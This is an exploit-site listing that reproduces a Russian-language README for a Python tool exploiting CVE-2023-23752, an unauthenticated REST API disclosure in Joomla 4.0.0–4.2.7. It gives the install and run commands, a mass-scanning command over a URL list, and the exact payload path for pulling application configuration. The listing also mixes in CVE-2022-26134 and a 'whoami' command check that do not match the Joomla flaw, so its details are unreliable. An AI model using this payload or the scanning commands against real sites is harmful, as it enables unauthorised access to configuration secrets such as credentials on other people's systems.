Sploitus

Exploit for CVE-2023-23752 CVE-2022-26134 CVE-2023-23752

kitploit Β· 2026-08-25

Exploit Code

MARKDOWN38 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-YTXZX-CVE-2023-23752
CVE-2023-23752 - ВоспроизвСдСниС уязвимости Π½Π΅Π°Π²Ρ‚ΠΎΡ€ΠΈΠ·ΠΎΠ²Π°Π½Π½ΠΎΠ³ΠΎ доступа Π² Joomla

# ИспользованиС скрипта

Установка Π±ΠΈΠ±Π»ΠΈΠΎΡ‚Π΅ΠΊ Python

pip install -r requirements.txt

ΠŸΡ€ΠΎΠ²Π΅Ρ€ΠΊΠ° уязвимости

python3 CVE-2022-26134_check.py -u url -c whoami

![ΠΈΠ·ΠΎΠ±Ρ€Π°ΠΆΠ΅Π½ΠΈΠ΅](https://assets.kitploit.com/production/public/readmes/34737/29a6f0085d19c4253347e9ab20c533b15ba96e4f25cefa298c52682838bc5732.png)

МассовоС сканированиС

python3 CVE-2023-23752.py -f url_part.txt

![ΠΈΠ·ΠΎΠ±Ρ€Π°ΠΆΠ΅Π½ΠΈΠ΅](https://assets.kitploit.com/production/public/readmes/34737/4a8d7edae6c302049b4ccadd44e5f3442661ad76051bb829fc215d29954dcc10.png)

# Π—Π°Ρ‚Ρ€ΠΎΠ½ΡƒΡ‚Ρ‹Π΅ вСрсии

4.0.0 <= Joomla <= 4.2.7

# ВоспроизвСдСниС уязвимости

payload:

/api/index.php/v1/config/application?public=true

ΠŸΠ΅Ρ€Π΅ΠΉΠ΄ΠΈΡ‚Π΅ ΠΏΠΎ уязвимому адрСсу, ΠΏΠ΅Ρ€Π΅Ρ…Π²Π°Ρ‚ΠΈΡ‚Π΅ ΠΏΠ°ΠΊΠ΅Ρ‚, ΠΏΠΎΠ²Ρ‚ΠΎΡ€ΠΈΡ‚Π΅ ΠΎΡ‚ΠΏΡ€Π°Π²ΠΊΡƒ ΠΏΠ°ΠΊΠ΅Ρ‚Π°.

![ΠΈΠ·ΠΎΠ±Ρ€Π°ΠΆΠ΅Π½ΠΈΠ΅](https://assets.kitploit.com/production/public/readmes/34737/72b489643730f2e66ecf0798af2e28708b8c5c40a4a874a808f01e1ef51bac2a.png)

# ΠŸΡ€ΠΈΠ½Ρ†ΠΈΠΏ уязвимости

Π’ Joomla! CMS вСрсии 4.0.0–4.2.7 ΠΈΠ·-Π·Π° Π½Π΅ΠΏΡ€Π°Π²ΠΈΠ»ΡŒΠ½ΠΎΠ³ΠΎ ограничСния доступа ΠΊ ΠΊΠΎΠ½Π΅Ρ‡Π½Ρ‹ΠΌ Ρ‚ΠΎΡ‡ΠΊΠ°ΠΌ Π²Π΅Π±-слуТб Π²ΠΎΠ·ΠΌΠΎΠΆΠ΅Π½ Π½Π΅Π°Π²Ρ‚ΠΎΡ€ΠΈΠ·ΠΎΠ²Π°Π½Π½Ρ‹ΠΉ доступ ΠΊ REST API, Ρ‡Ρ‚ΠΎ ΠΏΡ€ΠΈΠ²ΠΎΠ΄ΠΈΡ‚ ΠΊ ΡƒΡ‚Π΅Ρ‡ΠΊΠ΅ ΠΊΠΎΠ½Ρ„ΠΈΠ΄Π΅Π½Ρ†ΠΈΠ°Π»ΡŒΠ½ΠΎΠΉ ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ.